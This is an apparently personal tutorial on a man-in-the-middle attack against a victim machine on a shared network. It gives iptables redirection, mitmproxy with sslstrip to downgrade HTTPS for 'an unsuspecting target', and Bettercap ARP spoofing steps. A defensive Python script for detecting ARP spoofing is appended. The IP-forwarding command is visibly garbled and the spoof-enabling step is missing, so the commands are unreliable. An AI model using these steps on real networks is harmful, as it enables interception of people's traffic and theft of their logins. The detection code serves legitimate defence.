Remote Man-in-the-Middle with Bettercap and Mitmproxy

Remote MITM Setup

Basic Environment Setup

Hook the attack machine (which I'll call BlackArch) and the victim machine (which I'll call Alice) to the same network. I did this in testing by having both of them in a bridged network configuration under my phone's hotspot.

We'll need to set up some IP forwarding and redirection first.

Setup IP Forwarding and Redirection

$ sysctl -w _forward=1
$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
$ ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080

Mitmproxy will take care of the rest.

Setup the Proxy: MitmProxy

Link:

$ mitmproxy --mode transparent --showhost -s sslstrip.py # --showhost will show the host in the URL display

We've got redirection to port 8080 (mitmproxy port). And we have a proxy set up to intercept anything going there (HTTP and HTTPS). The sslstrip.py script is there to strip out HTTPS headers during a redirection. It's not ideal for navigating in between the pages, but an unsuspecting target will be vulnerable.

If you're doing this locally (not to a remote target) for the purposes of dynamic analysis or whatever, don't use sslstrip.py and navigate to AFTER the ARP spoofing step to install mitmproxy's SSL certificates.

ARP Spoofing with Bettercap

NOTE: you can actually set up a proxy with Bettercap's http.proxy and https.proxy modules. I love it and it works like magic, but I'd rather have one tool do one thing. To be frank, I would even use Burp as the proxy instead, but I prefer mitmproxy since it's CLI-based and works in a pinch.

Conduct a small nmap scan to figure out what's Alice's IP. Let's say we found out it's 10.10.10.4.

Conduct the ARP spoof:

$ sudo bettercap -iface enp0s3
> net.recon off # Disable net.recon modules
> net.sniff on # Sniff the network, just to know if things are working. Since the redirection occurs to my machine, packets are local
> # I won't see any HTTP packets here since I didn't run http.proxy module

If you're on a local environment (not with a remote Alice), we can run arp -a on Alice now to see that BlackArch's MAC address now appears for the gateway as well.

If you wanna do any web page replacements, it's best done as a Python script attached to mitmproxy with the -s parameter.
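The `arp -a` check described above can be automated on the monitored host. This is an added example, not code from the original post: it parses `arp -a` output (Linux and Windows layouts) and reports when the gateway's MAC address is also claimed by another IP. The gateway address 10.10.10.1, the other addresses and all MAC values are constructed.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -a` on Alice (Linux layout) while the spoof is active.
SAMPLE_LINUX = """\
_gateway (10.10.10.1) at 08:00:27:5e:11:02 [ether] on enp0s3
? (10.10.10.7) at 08:00:27:5e:11:02 [ether] on enp0s3
? (10.10.10.9) at 08:00:27:c4:9a:30 [ether] on enp0s3
? (10.10.10.12) at <incomplete> on enp0s3
"""

# Constructed sample: the same situation in the Windows `arp -a` layout.
SAMPLE_WINDOWS = """\
Interface: 10.10.10.4 --- 0x6
  Internet Address      Physical Address      Type
  10.10.10.1            08-00-27-5e-11-02     dynamic
  10.10.10.7            08-00-27-5e-11-02     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
MAC_RE = re.compile(r"\b([0-9a-f]{1,2}(?:[:-][0-9a-f]{1,2}){5})\b", re.I)

def parse_arp(text):
    """Return {mac: set(ips)} for unicast entries in `arp -a` output."""
    table = defaultdict(set)
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if not (ip and mac):
            continue  # header lines and <incomplete> entries
        octets = [int(o, 16) for o in re.split("[:-]", mac.group(1))]
        if octets[0] & 1:
            continue  # broadcast/multicast MACs are legitimately shared
        table[":".join(f"{o:02x}" for o in octets)].add(ip.group(1))
    return table

def find_spoof(text, gateway_ip):
    """Return (mac, other_ips) if the gateway's MAC is shared, else None."""
    for mac, ips in parse_arp(text).items():
        if gateway_ip in ips and len(ips) > 1:
            return mac, sorted(ips - {gateway_ip})
    return None

if __name__ == "__main__":
    for sample in (SAMPLE_LINUX, SAMPLE_WINDOWS):
        print(find_spoof(sample, "10.10.10.1"))
```

A shared gateway MAC is a strong indicator rather than proof; comparing against a MAC recorded for the gateway before the incident removes the ambiguity.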